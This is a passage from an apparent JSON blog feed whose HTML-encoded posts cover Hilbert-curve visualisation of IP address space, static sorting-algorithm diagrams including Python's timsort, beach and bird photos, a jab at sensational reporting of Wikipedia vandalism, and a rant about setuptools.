5:<\/p>\n<table class=\"spacertable\">\n    <tr>\n        <td><img src=\"h1.png\"\/><br>N=1<\/td>\n        <td><img src=\"h2.png\"\/><br>N=2<\/td>\n        <td><img src=\"h3.png\"\/><br>N=3<\/td>\n        <td><img src=\"h4.png\"\/><br>N=4<\/td>\n        <td><img src=\"h5.png\"\/><br>N=5<\/td>\n    <\/tr>\n<\/table>\n<p>To translate from one order to the next, we simply replace U-shapes like the\nthe N=1 diagram with Y-shapes like the N=2 diagram. So, in the N=1 diagram\nthere is a single U to be replaced, in the N=2 diagram there are 4 U-shapes\n(two at the top, oriented left and right, and two at the bottom oriented down).\nEach subsequent order has 4 times the number of U shapes the previous one had,\nso for N=3 we have 16 replacements to do, and so on and so forth.<\/p>\n<p>Mathematicians are interested in the behaviour of the limit curve as N\napproaches infinity - luckily the properties of the curve that are interesting\nto computer scientists manifest well short of that. For the purposes of this\npost, we can view the order-N curve simply as a way to lay out a sequence of\n2**2N items on a plane, with the rather interesting property that items that\nare near each other in the sequence are also near each other on the plane:<\/p>\n<div class=\"media\">\n    <a href=\"coordinates.png\">\n        <img src=\"coordinates.png\"  \/>\n    <\/a>\n\n    \n<\/div>\n<p>The recursive construction above is a nice way to explain the curve, but doesn't\nlead to an efficient way to actually draw it. For this I turned to Henry S.\nWarren's wonderful <a rel=\"external\" href=\"http:\/\/www.amazon.com\/exec\/obidos\/ASIN\/0201914654\/qid%3D1033395248\/sr%3D11-1\/ref%3Dsr_11_1\/104-7035682-9311161\">Hacker's\nDelight<\/a>, one of those books that I return to again and again. If you don't\nalready own a copy, just buy it - you won't be disappointed. All the images in\nthis post and in the Explorer were drawn with PyCairo using the algorithm for\ncalculating co-ordinates from the distance along the curve given in section 14.4\nof this book.<\/p>\n<h2 id=\"visualising-ip-geolocation\">Visualising IP Geolocation<\/h2>\n<p>Mapping IP addresses to countries is a tricky affair. Control of any given\naddress filters down from IANA to the regional registries, from regional\nregistries to national and local registries, and from there to a myriad of\nprivate and government organisations. Here, horse-trading and private enterprise\ntakes over and IP blocks are sold, traded and routed arbitrarily, with the\nconsequence that any given IP might actually be located in geographical area\ntotally unrelated to the controlling organization or even the registry region. A\nnumber of companies now offer geolocation databases at various prices, some of\nthem for free. The databases themselves typically contain more than 100,000\nsubnets, usually spanning something like two billion actual addresses. I had\nabout half a dozen of these databases to compare, and, being a visual creature,\nI wanted to <strong>see<\/strong> what I was dealing with. I've been fascinated with the\nHilbert curve for a long time, but I first came across the idea of using it to\nvisualise the entire IPv4 address space in Randall Munroe's excellent <a\nhref=\"http:\/\/xkcd.com\/195\/\">hand-drawn map of the Internet<\/a>. After this was\npublished in 2006 a slew of more detailed visualisations appeared, including at\nleast <a href=\"http:\/\/www.isi.edu\/ant\/address\/whole_internet\/index.html\">one on\na 1:1 scale<\/a>.<\/p>\n<p>We can map X points of data onto a discrete Hilbert curve of order lb(X)\/2, so\nthe order 16 Hilbert curve would suffice to display all 2**32 IP addresses at\na one-to-one scale. To produce a more manageable image size, I used an order 9\nHilbert curve producing a 512x512 pixel image, where each pixel represents a\nbucket of 16384 addresses. I then rendered a series of transparent PNG layers -\none showing all addresses in the database, and a set of overlays showing the\naddresses in each country and some \"landmarks\" like the <a\nhref=\"http:\/\/tools.ietf.org\/html\/rfc1918\">RFC1918<\/a> addresses. The result\nlooks something like the image at the head of this post. To make the\nvisualisation more interactive, I bolted things together with a bit of\nJavascript to let me easily switch between countries, and to show IP addresses\nwhen hovering over the image. You can find the resulting visualisation for one\nof the freely-available geolocation databases - <a\nhref=\"http:\/\/www.wipmania.com\/en\/base\/\">WorldIP<\/a> - here:<\/p>\n<h2 id=\"hilbert-explorer\"><a href=\"\/geohilbert\/index.html\">Hilbert Explorer<\/a><\/h2>\n<p>I'll stop there for now, and leave the actual database comparison and a deeper\nexploration of the related issues for future posts.<\/p>\n"},{"title":"Seashells from Murdering Beach","published":"2009-08-28T00:00:00+00:00","updated":"2009-08-28T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/murderingshells\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/murderingshells\/","content":"<style>\n    .shells td {\n        border-bottom: 0;\n    }\n<\/style>\n<table class=\"shells\">\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863253255\/\" title=\"051shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2598\/3863253255_b6a88458a6_t.jpg\" width=\"100\" height=\"100\" alt=\"051shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863255667\/\" title=\"052shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2477\/3863255667_9de928b4d2_t.jpg\" width=\"100\" height=\"100\" alt=\"052shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863256917\/\" title=\"056shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2626\/3863256917_9da498eb94_t.jpg\" width=\"100\" height=\"100\" alt=\"056shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864040990\/\" title=\"057shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2601\/3864040990_b6465402e8_t.jpg\" width=\"100\" height=\"100\" alt=\"057shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864042394\/\" title=\"059shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2662\/3864042394_fd9a3e2f14_t.jpg\" width=\"100\" height=\"100\" alt=\"059shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864043258\/\" title=\"060shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2557\/3864043258_2187b97b8c_t.jpg\" width=\"100\" height=\"100\" alt=\"060shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863260683\/\" title=\"061shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2553\/3863260683_6cc9662275_t.jpg\" width=\"100\" height=\"100\" alt=\"061shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864044842\/\" title=\"062shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3181\/3864044842_83ed99b591_t.jpg\" width=\"100\" height=\"100\" alt=\"062shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863262185\/\" title=\"064shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3454\/3863262185_c93aff80f1_t.jpg\" width=\"100\" height=\"100\" alt=\"064shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863263741\/\" title=\"065shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2596\/3863263741_1de40df77a_t.jpg\" width=\"100\" height=\"100\" alt=\"065shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863264743\/\" title=\"066shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2531\/3863264743_e51a081754_t.jpg\" width=\"100\" height=\"100\" alt=\"066shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863265971\/\" title=\"067shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2584\/3863265971_a540e4cd74_t.jpg\" width=\"100\" height=\"100\" alt=\"067shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863267413\/\" title=\"068shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3513\/3863267413_efda95bd09_t.jpg\" width=\"100\" height=\"100\" alt=\"068shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863268603\/\" title=\"069shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2461\/3863268603_49c216a076_t.jpg\" width=\"100\" height=\"100\" alt=\"069shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863270349\/\" title=\"070shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2565\/3863270349_2df1a30663_t.jpg\" width=\"100\" height=\"100\" alt=\"070shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863271463\/\" title=\"071shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2633\/3863271463_b8bb6c9416_t.jpg\" width=\"100\" height=\"100\" alt=\"071shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864056086\/\" title=\"072shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2449\/3864056086_9bd2441496_t.jpg\" width=\"100\" height=\"100\" alt=\"072shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863273851\/\" title=\"073shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2598\/3863273851_e36366e0aa_t.jpg\" width=\"100\" height=\"100\" alt=\"073shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863275055\/\" title=\"074shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3547\/3863275055_0b078205e7_t.jpg\" width=\"100\" height=\"100\" alt=\"074shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3863276473\/\" title=\"075shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3438\/3863276473_918bc411d0_t.jpg\" width=\"100\" height=\"100\" alt=\"075shells\" \/><\/a><\/td>\n    <\/tr>\n    <tr>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864061252\/\" title=\"076shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2552\/3864061252_48d169eac2_t.jpg\" width=\"100\" height=\"100\" alt=\"076shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864062554\/\" title=\"077shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3226\/3864062554_3b2ac66bcf_t.jpg\" width=\"100\" height=\"100\" alt=\"077shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864063810\/\" title=\"078shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2459\/3864063810_5cf4bcfb9a_t.jpg\" width=\"100\" height=\"100\" alt=\"078shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864064924\/\" title=\"079shells by cortesi, on Flickr\"><img src=\"http:\/\/farm4.static.flickr.com\/3511\/3864064924_bcb95a8ea2_t.jpg\" width=\"100\" height=\"100\" alt=\"079shells\" \/><\/a><\/td>\n        <td><a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3864065752\/\" title=\"080shells by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2519\/3864065752_44baaafcef_t.jpg\" width=\"100\" height=\"100\" alt=\"080shells\" \/><\/a><\/td>\n    <\/tr>\n<\/table>\n<p>Spent the moring collecting and taking photos of tiny seashells on Murdering\nBeach - a secluded local spot with a grisly past. The shells are all about the\nsame size - a centimeter or so accross - and seem to be from the same species of\nmarine mollusc. The variety of patterns and colours is endless and fascinating -\nmy inexpertly lit photographs don't do them justice.<\/p>\n"},{"title":"Sorting Algorithm Visualisation Tidbits","published":"2009-08-11T00:00:00+00:00","updated":"2009-08-11T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/sortingquickies\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/sortingquickies\/","content":"<ul>\n<li>Jacob Seidelin has created an awesome port of the sorting algorithm\nvisualisations I came up with in 2007 to Javascript, using the canvas element\nto do the drawing. <a\nhref=\"http:\/\/blog.nihilogic.dk\/2009\/04\/canvas-visualizations-of-sorting.html\">Well\nworth checking out<\/a>.<\/li>\n<li>Another blogger (I'd love to be more specific, but the blog seems to be\nanonymous) was spurred by my post to to wonder what sorting algorithms <em>sound<\/em>\nlike. The fascinating result is <a\nhref=\"http:\/\/www.pillowsopher.com\/blog\/?cat=4\">over here<\/a>. Bubblesort turns\nout to quite musical - who knew?<\/li>\n<li>Finally, timsort, which I drew <a href=\"https:\/\/corte.si\/posts\/code\/timsort\/\">pictures of in my last\npost<\/a>, has <a\nhref=\"http:\/\/bugs.sun.com\/bugdatabase\/view_bug.do?bug_id=6804124\">replaced\nmergesort in Java.<\/a><\/li>\n<\/ul>\n"},{"title":"Visualising Sorting Algorithms: Python's timsort","published":"2009-08-08T00:00:00+00:00","updated":"2009-08-08T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/timsort\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/timsort\/","content":"<p><strong>Update<\/strong> See <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> for many more visualisations!<\/p>\n<p>A couple of years ago, I blogged about a technique I came up with for\n<a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">statically visualising sorting\nalgorithms<\/a> during a somewhat\nScotch-fueled night of idle hacking. A recent day of poking at the Python\ncodebase gave me an excuse to revisit the post and brush off the bit of code\nthat underpins it. I've wanted to take a closer look at timsort - Tim Peters'\nwonderful sorting implementation for Python - for a while now. In the previous\npost I made a big deal about the fact that many attributes of sorting algorithms\nare easier to see in my static visualisations than in traditional animated\nequivalents. So, I thought it would be fun to see if one could get to grips with\na real-world algorithm like timsort by visualising it. The fruit of my labour\ncan be found below - if this kind of thing turns your crank, read on.<\/p>\n<p>Before you go on, you might first want to take a look at the <a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">original\npost<\/a> for an explanation of how the\ndiagrams are constructed and some related caveats.<\/p>\n<h2 id=\"inspecting-timsort\">Inspecting timsort<\/h2>\n<p>The first step was to get hold of the progressive sorting data I needed for the\nvisualisation. The way timsort is implemented has two properties that helped\nhere - firstly, it's largely in-place, and secondly, when interrupted by an\nexception in the __cmp__ method of one of the elements it is sorting, it\nleaves the array partially sorted. The pleasant result is that I could get all\nthe data I needed in pure Python, without instrumenting the interpreter source.\nA link to the code is at the bottom of this post.<\/p>\n<h2 id=\"a-first-guess-at-the-algorithm\">A first guess at the algorithm<\/h2>\n<p>The first thing I did was to see if I could get a feel for timsort straight\nfrom the visualisation, without looking at the implementation (yes, I'm\ncheating slightly, since I already had an idea of what I would see). Here's\ntimsort sorting a shuffled array of 64 elements:<\/p>\n<div class=\"media\">\n    <a href=\"64r-tim.png\">\n        <img src=\"64r-tim.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        timsort - 64 elements\n    <\/div>\n    \n<\/div>\n<p>It's immediately clear that timsort has divided the data up into two blocks of\n32 elements. The blocks are pre-sorted in turn (the first two \"triangles\" of\nactivity, reading from left to right), before being merged together in the final\nstep (the cross-hatch pattern at the right of the diagram). Looking closer, it's\neven possible to tell that the pre-sorting seems to be using insertion sort -\ncompare the distinctive triangular pattern here with the insertion sort\nvisualisation in the <a href=\"https:\/\/corte.si\/posts\/code\/visualisingsorting\/\">previous post<\/a>.\nWe can confirm this by taking the same data, and running it through an insertion\nsort visualisation.  Here's the first block of 32 elements sorted by insertion\nsort:<\/p>\n<div class=\"media\">\n    <a href=\"half.png\">\n        <img src=\"half.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Insertion sort\n    <\/div>\n    \n<\/div>\n<p>As you can see, this sorting sequence is identical to the one in the upper-left\npart of the timsort diagram. A similar bit of hackery would show that the final\nmerge is done with mergesort. Ok, so at this point, we can take a stab at a\nbroad outline of the timsort algoritm: break the data up into blocks, pre-sort\nthose blocks using insertion sort, and then merge the blocks together using\nmergesort.<\/p>\n<p>This is pretty good going for quick inspection of a single diagram.<\/p>\n<h2 id=\"what-s-actually-happening\">What's actually happening<\/h2>\n<p>Flicking to the <a href=\"http:\/\/bugs.python.org\/file4451\/timsort.txt\">cheat\nsheet<\/a>, we can see that this guess is almost right. The business-end of\ntimsort is a mergesort that operates on runs of pre-sorted elements. A minimum\nrun length <strong>minrun<\/strong> is chosen to make sure the final merges are as balanced as\npossible - for 64 elements, <strong>minrun<\/strong> happens to be 32. Before the merges\nbegin, a single pass is made through the data to detect pre-existing runs of\nsorted elements. Descending runs are handled by simply reversing them in place.\nIf the resultant run length is less than <strong>minrun<\/strong>, it is boosted to <strong>minrun<\/strong>\nusing insertion sort. On a shuffled array with no significant pre-existing runs,\nthis process looks exactly like our guess above: pre-sorting blocks of\n<strong>minrun<\/strong> elements using insertion sort, before merging with merge sort.<\/p>\n<p>We can see a bit more detail by giving timsort the type of data it excels at -\na partially sorted array:<\/p>\n<div class=\"media\">\n    <a href=\"combo.png\">\n        <img src=\"combo-annotated.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        timsort - 64 elements\n    <\/div>\n    \n<\/div>\n<p>Now, looking at the marked progression from left to right:<\/p>\n<ul>\n<li><strong>1)<\/strong> timsort finds a descending run, and reverses the run in-place. This is done\ndirectly on the array of pointers, so seems \"instant\" from our vantage point.<\/li>\n<li><strong>2)<\/strong> The run is now boosted to length <strong>minrun<\/strong> using insertion sort.<\/li>\n<li><strong>3)<\/strong> No run is detected at the beginning of the next block, and insertion sort\nis used to sort the entire block. Note that the sorted elements at the bottom\nof this block are not treated specially - timsort doesn't detect runs that\nstart in the middle of blocks being boosted to <strong>minrun<\/strong>.<\/li>\n<li><strong>4)<\/strong> Finally, mergesort is used to merge the runs.<\/li>\n<\/ul>\n<p>Of course, there's a lot that's not covered here: merge order, stability, the\nsecondary memory requirements of the algorithm, and so forth. Maybe I'll get to\nsome of these in a follow-up post. That said, I think this is still quite a\nreasonable high-level pictorial guide to timsort.<\/p>\n<p>I relied heavily on <a href=\"http:\/\/bugs.python.org\/file4451\/timsort.txt\">Uncle\nTim's own description of the algorithm<\/a> in writing this post - if you're\ninterested in timsort, this document is definitely mandatory reading.<\/p>\n<h2 id=\"the-code\">The Code<\/h2>\n<p>I've brushed up the code I included in my previous post and put it on <a\nhref=\"http:\/\/github.com\/cortesi\/sortvis\/tree\/master\">github<\/a>. You can check\nit out like so:<\/p>\n<pre class=\"giallo\" style=\"color: #24292E; background-color: #FFFFFF;\"><code data-lang=\"shellscript\"><span class=\"giallo-l\"><span style=\"color: #6F42C1;\">git<\/span><span style=\"color: #032F62;\"> clone git:\/\/github.com\/cortesi\/sortvis.git<\/span><\/span><\/code><\/pre>"},{"title":"Buller's Albatross","published":"2009-07-12T00:00:00+00:00","updated":"2009-07-12T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/photos\/bullers\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/photos\/bullers\/","content":"<p>An encounter with a magnificent bird today - Buller's Albatross. It glided in\nto the side of the boat we were in to check if we had any fish, but took off\ndisappointed when it turned out we did not:<\/p>\n<center>\n    <a href=\"http:\/\/www.flickr.com\/photos\/8268815@N08\/3715192684\/\" title=\"Buller's Albatross by cortesi, on Flickr\"><img src=\"http:\/\/farm3.static.flickr.com\/2610\/3715192684_fae89809e5.jpg\" width=\"500\" height=\"189\" alt=\"Buller's Albatross\" \/><\/a>\n<\/center>\n"},{"title":"How to become a cyber bandit","published":"2008-06-03T00:00:00+00:00","updated":"2008-06-03T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/security\/badreporting\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/security\/badreporting\/","content":"<p>I came accross a hilariously inept bit of tech reporting today, courtesy of the\nSydney Morning Herald. Apparently the Wikipedia page for Mick Keelty,\nAustralia's Federal Police Commissioner, was vandalised last week. Hardly\nearth-shattering, right? Just revert the changes, and move on. To a\nsensation-hungry hack without the faintest clue what Wikipedia is, however, this\nlooks like a Story. More particularly, it looks like a story entitled \"<a\nhref=\"http:\/\/www.smh.com.au\/news\/technology\/cyber-bandit-sabotages-top-cop\/2008\/05\/31\/1212258621186.html\">Cyber\nbandit sabotages top cop<\/a>\".<\/p>\n<p>The article gives a minutely detailed rundown of the rather juvenile vandalism\n(apparently perpetrated by a not very imaginative 13-year-old), and is\naccompanied by a stock photo showing a depressed-looking Keelty, evidently\nmeditating on the deep unfairness of it all. The Wikipedia vandal is not just a\n\"cyber bandit\" - he is also referred to as a \"hacker\" throughout. The icing on\nthe cake, however, is what has to be a mis-quote from <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Angela_Beesley\">Angela Beesley<\/a>:<\/p>\n<blockquote>\n<p>Wikimedia Foundation Advisory Board chairwoman Angela Beesley said the person\nwho made the edits infiltrated the site from outside.<\/p>\n<\/blockquote>\n<p>Infiltrated Wikipedia from the outside? You don't say.<\/p>\n"},{"title":"setuptools sucks","published":"2007-06-18T00:00:00+00:00","updated":"2007-06-18T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/setuptoolssucks\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/setuptoolssucks\/","content":"<p>One of the epic conflicts of our time is being waged between two software design\nphilosophies (bear with me here). Those who follow <strong>Design Philosophy A<\/strong> trust\ntheir users. Software is designed to be transparent and easy to inspect. Users\nare provided with simple and direct ways to control behaviour, and their choices\nare respected. Software developers avoid guessing the user's intent, since users\ncan be trusted to do the sensible thing themselves. Those who follow <strong>Design\nPhilosophy B<\/strong> think their users are idiots.  Software is therefore opaque and\ndifficult to inspect, because users wouldn't understand what is going on, and\nshould be prevented from even trying. The developer's guess is always more\ntrustworthy than the user's command. Users are robbed of options, because if we\ngive the user too much control, they'll just fuck things up.<\/p>\n<p>Philosophy A has given you the open source movement, Unix and the Internet.\nPhilosophy B has given you the Microsoft Paperclip, DRM and an endless stream of\nclueless MCSEs. Philosophy A stands for open standards, free information\nexchange, and user control. Philosophy B restricts how you can use information\nstored on your own computer, violates your privacy, and puts the interests of\nsoftware makers ahead of that of the user. In corner A stands Richard Stallman,\nLinus Torvalds and Theo de Raadt, dressed in light and armed with flaming\nswords. In corner B, wreathed in shadow, stands Bill Gates, a cohort of ignorant\ngreedy politicians and a dark army of patent lawyers.<\/p>\n<p>It is against this epic background that I invite you to consider another player\non the side of darkness: <a\nhref=\"http:\/\/peak.telecommunity.com\/DevCenter\/setuptools\">setuptools<\/a>. No, I\ndon't think <a href=\"http:\/\/dirtsimple.org\/\">Phillip J. Eby<\/a> is out to take\ncontrol of your computer and leech your bank account details (though you might\nwell prefer this to his attempts to <a\nhref=\"http:\/\/dirtsimple.org\/2007\/02\/how-not-to-be-loser.html\">de-activate your\nloser circuit<\/a>). I surely do believe, though, that he thinks you are an\nidiot. Because setuptools, again and again, makes some decidedly Philosophy B\ndesign decisions. Witness:<\/p>\n<ul>\n<li>Setuptools is nosy. It deduces things magically from the version control\nsystem you use, so when you enter the Brave New World of <a href=\"\nhttp:\/\/git.or.cz\/\">distributed versioning<\/a>, all your build and\ndistribution scripts silently malfunction.<\/li>\n<li>Setuptools is needlessly opaque. <a\nhref=\"http:\/\/peak.telecommunity.com\/DevCenter\/PythonEggs\">Eggs<\/a> break\nsimple transparencies we currently take for granted - for example, we lose\nthe ability to trivially inspect installed libraries with a pager, or to\neasily list the contents of an installed module. They also complicate more\nsubtle things - because eggs are compressed, project data file access becomes\na pain. If you need direct file access, you need to use even MORE setuptools\nmagic to unpack project data files to a temporary directory.<\/li>\n<li>Setuptools is obstinate. It will automatically insert .eggs at the head of\nyour sys.path to make sure they get imported in preference to any existing\nlibraries. If I insert something into sys.path (say, for instance, to run a\ntest suite against the development version of my library), I do NOT want my\ndistribution mechanism to over-ride me. And no, using the setuptools\ndevelopment mode magic is not a satisfactory answer.<\/li>\n<\/ul>\n<p>This type of intrusive design is disrespectful to users.  Whenever you prefer to\ntrust your own imperfect guesses, rather than letting the user specify what they\nwant, you are disrespectful to your users. Whenever you needlessly make a system\nobscure to inspection, you are disrespectful to your users. Whenever you allow\nyour software to spill beyond its rightful bounds (by, for example, getting\nintimate with my version control system), you are disrespectful to your users.<\/p>\n<p>I believe that most people use setuptools because it provides a few simple\npieces of functionality that could easily be added to distutils without the\ndross and bad design. Grafting dependencies and better package data management\nonto distutils would go about 80% of the way to meeting my modest expectations.\nSadly, in one of those minor tragedies that life is so full of, it appears that\nsetuptools <a\nhref=\"http:\/\/mail.python.org\/pipermail\/python-dev\/2006-April\/063964.html\">wins\nby default<\/a>, simply because the problem domain is so goddamn boring that\nno-one else has bothered.<\/p>\n"},{"title":"Visualising Sorting Algorithms","published":"2007-04-27T00:00:00+00:00","updated":"2007-04-27T00:00:00+00:00","link":{"@attributes":{"href":"https:\/\/corte.si\/posts\/code\/visualisingsorting\/","type":"text\/html"}},"id":"https:\/\/corte.si\/posts\/code\/visualisingsorting\/","content":"<p><strong>Update<\/strong> See <a rel=\"external\" href=\"http:\/\/sortvis.org\">sortvis.org<\/a> for many more visualisations!<\/p>\n<p>I dislike <a\nhref=\"http:\/\/ftp.csci.csusb.edu\/public\/class\/cs455\/cs455_2000\/java\/InsertionSortLauncher.html\">animated<\/a>\n<a href=\"http:\/\/www.cs.ubc.ca\/~harrison\/Java\/sorting-demo.html\">sorting<\/a> <a\nhref=\"http:\/\/www2.hawaii.edu\/~copley\/665\/HSApplet.html\">algorithm<\/a> <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Image:Sorting_heapsort_anim.gif\">visualisations<\/a> - there's too much of an air of hocus-pocus about them. Something\nimpressive and complicated happens on screen, but more often than not the\naudience is left mystified. I think their creators must also know that they\nhave precious little explanatory value, because the better ones are sexed up\nwith play-by-play doodles, added, one feels, as an apologetic afterthought by\nsome particularly dorky sportscaster. Nevertheless I've been unable to\nfind a single attempt to visualise a sorting algorithm statically (if you know\nof any, please drop me a line).<\/p>\n<p>So, presented below are the results of a pleasant evening with some nice Scotch\nand the third volume of Knuth. First, here's a taster - a static visualisation\nof heapsort:<\/p>\n<div class=\"media\">\n    <a href=\"heap.png\">\n        <img src=\"heap.png\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Heapsort\n    <\/div>\n    \n<\/div>\n<p>I think these simple static visualisations are much clearer than most animated\nattempts - and they have the added benefit of also being, to my not entirely\nunbiased eye, rather beautiful. You will find more visualisations, source code,\nand a tediously long explanation of why I bothered, after the jump.<\/p>\n<h2 id=\"the-problem\">The Problem<\/h2>\n<p>Before I go on, though, bear with me while I press home my point about\nanimation with a particularly heinous example of the genre. I found the\nfollowing specimen on the <a\nhref=\"http:\/\/en.wikipedia.org\/wiki\/Bubblesort\">Wikipedia page for\nBubblesort<\/a>:<\/p>\n<div class=\"media\">\n    <a href=\"bubble_sort_animation.gif\">\n        <img src=\"bubble_sort_animation.gif\"  \/>\n    <\/a>\n\n    \n    <div class=\"subtitle\">\n        Bubblesort visualisation from Wikipedia\n    <\/div>\n    \n<\/div>\n<p>Now, it is my measured opinion that this animation has all the explanatory power\nof a glob of porridge flung against a wall. To see why I say this, try to find\nrough answers to the following set of simple questions with reference to it:<\/p>\n<ul>\n<li>After what percentage of time is half of the array sorted?<\/li>\n<li>Can you find an element that moved about half the length of the array to\nreach its final destination?<\/li>\n<li>What percentage of the array was sorted after 80% of the sorting process?\nHow about 20%?<\/li>\n<li>Does the number of sorted elements grow linearly or non-linearly with\ntime (i.e. logarithmically or exponentially)?<\/li>\n<\/ul>\n<p>If you thought that was harder than it needed to be, blame animation. First,\nwhile humans are great at estimating distances in space, they are pretty bad at\nestimating distances in time. This is why you had to watch the animation two or\nthree times to answer the first question. When we translate time to a geometric\nlength, as is done in any scientific diagram with a time dimension, this\nestimation process becomes easy. Second, many questions about sorting algorithms\nrequire us to actively compare the sorting state at two or more different time\npoints. Since we don't have perfect memories, this is very, very hard in all but\nthe simplest cases. This leaves us with a strangely one-dimensional view into an\nanimation - we can see what's on screen at any given moment, but we have to\nstrain to answer simple questions about, say, rates of change. Which is why the\nfinal question is hard to answer accurately.<\/p>\n<h2 id=\"finding-flatland\">Finding Flatland<\/h2>\n<p>It turns out that it is pretty easy to find a static, two-dimensional encoding\nfor the sorting process. The specific technique used here only works when the\nsorting algorithm is in-place, i.e. does not use any storage external to the\narray itself. Some of the algorithms below have been slightly modified from\ntheir standard forms to make sure they have this property. The magnitude of a\nnumber is indicated by shading - higher numbers are darker, and lower numbers\nare lighter. We begin on the left hand side with the numbers in a random order,\nand the sorting progression plays out until we reach the right hand side with a\nsorted sequence. Time, in this particular case, is measured by the number of\n\"swaps\" performed. This means that all swaps are equidistant on the diagram, and\nthat only a single swap occurs at any point in time.  When I refer to \"time\"\nwhen talking about these diagrams, I am therefore not referring to clock time.<\/p>\n<p>Now, I should be clear at the outset that I haven't tried to pack these\ndiagrams with as much information as possible. For example, I don't include\ntick marks for time units, nor do I explicitly mark algorithm details like\nInstead, I've simply tried to produce images that give a clear sense of the\n\"flow\" over time of the algorithms, while simultaneously 